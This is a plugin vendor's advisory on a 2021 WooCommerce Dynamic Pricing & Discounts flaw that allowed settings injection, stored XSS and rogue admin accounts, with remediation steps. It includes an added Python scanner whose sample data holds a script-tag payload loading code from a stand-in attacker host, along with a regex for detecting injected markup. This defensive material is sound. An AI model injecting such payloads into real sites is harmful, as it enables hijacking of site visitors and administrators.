What happened?
On August 19, 2021 we became aware of a critical security vulnerability in our WooCommerce Dynamic Pricing & Discounts plugin, versions 2.2 to 2.4.1. We patched this vulnerability in version 2.4.2 and introduced an extra layer of security measures in version 2.4.3.
This vulnerability allowed unauthenticated settings export and import. The settings import vulnerability allowed malicious actors to inject custom code into one of the text fields in plugin settings, effectively launching an XSS attack.
Malicious actors are known to be using automated tools to find websites running outdated versions of the plugin and to launch attacks against them. In some cases such attacks result in unwanted malicious admin accounts being created; the perpetrators know the login details of these accounts and could therefore use them to launch further attacks manually.
All users should update the plugin immediately and follow instructions provided below.
We are sorry that a human mistake on our end caused so much distress to our clients. We are standing by to help anyone affected by this vulnerability and will implement measures to reduce the risk of human mistakes in our development process.
How to tell if my site was targeted?
Check for any of these signs:
- Plugin settings have changed without your intervention, or text fields in plugin settings contain pieces of unfamiliar code (check the label, title, description and note fields across all tabs).
- You or visitors to your website are being redirected to other websites/pages.
- There are new users in the WordPress users list that you do not recognise (the commonly reported username is mainwpadmin, but it could be anything).
What should I do if my site was targeted?
It is important to understand that:
- The plugin itself does not contain any malicious code and is not "infected".
- The vulnerability allowed perpetrators to inject malicious code into text fields in the settings.
- Updating the plugin does not automatically remove malicious code that was inserted or undo other consequences of a previous attack - further actions need to be taken.
You should take the following actions to recover:
- Disable the plugin immediately.
- Update the plugin to version 2.4.3 (or a later version if available). If you are using native automatic updates, do this just before disabling the plugin, otherwise the automatic update option won't be available.
- Go to the WordPress users list of your website and delete all users that look suspicious or are unknown to you and/or other persons working on your site.
- Go to WooCommerce > Pricing & Discounts and review the settings under all tabs. Look for unusual content in text fields, remove it and submit your changes. Alternatively, you can clear all existing settings at once by either importing the blank settings file provided at the bottom of this article or deleting the row with key rp_wcdpd_settings from the wp_options table in your database.
- If possible, restore plugin settings from an unaffected backup (more details below).
- Enable the plugin and continue monitoring your website for any suspicious activity.
There are three potential ways to recover your previous settings:
- Import previously exported settings file, if you have one.
- Recover settings from a full site database backup. Your server administrator or hosting service provider may be able to help. Plugin settings are stored in the database table wp_options (the prefix may vary) under the key rp_wcdpd_settings. You can replace this record in your existing database with the one from a backup source.
- Since version 2.4, the plugin saves a copy of its settings during every plugin update. These copies are saved in the database table wp_options under keys of the form rp_wcdpd_settings_backup_{timestamp}. You can check your existing database for these backup records and copy their contents to the main rp_wcdpd_settings record.
Keep in mind that if a settings backup was made after the settings were injected with malicious code, restoring from that backup will also restore the malicious code. Use a backup that was made before the attack. If you are not sure, please get in touch with us and we will help you.
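The review of settings text fields and the choice of a pre-attack backup record described above can be scripted. The following is an added example, not part of this article or of the plugin; it assumes the wp_options values have already been decoded to JSON (real rows hold PHP-serialized arrays, which `wp option get <key> --format=json` decodes for you) and that the `{timestamp}` suffix on backup keys is Unix seconds, which the article does not state.

```python
import json
import re

# Settings text fields the article tells you to inspect on every tab.
TEXT_FIELDS = {"label", "title", "description", "note"}
# Markup that never belongs in a pricing-rule label (conservative heuristic, not a full XSS scanner).
SUSPICIOUS = re.compile(r"<\s*script|<\s*iframe|javascript:|\bon\w+\s*=", re.I)
BACKUP_PREFIX = "rp_wcdpd_settings_backup_"

def find_injected_fields(settings, path=""):
    """Recursively walk a decoded settings structure; return (path, value) for tainted text fields."""
    hits = []
    if isinstance(settings, dict):
        for key, value in settings.items():
            sub = f"{path}.{key}" if path else key
            if key in TEXT_FIELDS and isinstance(value, str):
                if SUSPICIOUS.search(value):
                    hits.append((sub, value))
            else:
                hits.extend(find_injected_fields(value, sub))
    elif isinstance(settings, list):
        for i, item in enumerate(settings):
            hits.extend(find_injected_fields(item, f"{path}[{i}]"))
    return hits

def clean_backups(rows, attack_ts):
    """Backup row names taken before attack_ts whose content scans clean, newest first (suffix assumed Unix seconds)."""
    good = []
    for name, raw in rows.items():
        if not name.startswith(BACKUP_PREFIX):
            continue
        ts = int(name[len(BACKUP_PREFIX):])
        if ts < attack_ts and not find_injected_fields(json.loads(raw)):
            good.append((ts, name))
    return [name for _, name in sorted(good, reverse=True)]

def rule(note):
    """Build a constructed settings blob holding one pricing rule with the given note text."""
    return json.dumps({"product_pricing": {"sets": [{"title": "Bulk deal", "note": note}]}})

INJECTED = "10% off <script src='//attacker.invalid/x.js'></script>"
# Constructed wp_options rows (option_name -> option_value), decoded to JSON for readability.
SAMPLE_ROWS = {
    "rp_wcdpd_settings": rule(INJECTED),                     # live settings, tainted
    "rp_wcdpd_settings_backup_1625097600": rule("10% off"),  # 2021-07-01, clean
    "rp_wcdpd_settings_backup_1629244800": rule(INJECTED),   # 2021-08-18, already tainted
    "rp_wcdpd_settings_backup_1629590400": rule(INJECTED),   # 2021-08-22, after the attack
}
```

Note that the 2021-08-18 backup is rejected on content, not on date: a backup made after the injection but before you noticed it carries the payload too, which is why date alone is not a safe criterion.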
What should I do if my site was not targeted?
- Update the plugin to version 2.4.3 (or a later version if available) immediately.
- Continue checking your website periodically for any signs of malicious activity.
How do I update the plugin?
Please check this article, which covers the different methods that can be used. We recommend enabling native automatic updates, which is the fastest and most reliable way to get the latest updates whenever they come out.
Can you help me?
If you were affected by this vulnerability and need help, or if you have any questions related to this topic, feel free to get in touch with us via this support site and we will do our best to help you.
Blank settings export/import file
You can use a blank settings export/import file to completely overwrite the settings on your installation if needed. To import this file, look for the following section under WooCommerce > Pricing & Discounts > Settings in the admin area of your website:
Click on the link below to download a blank settings export/import file: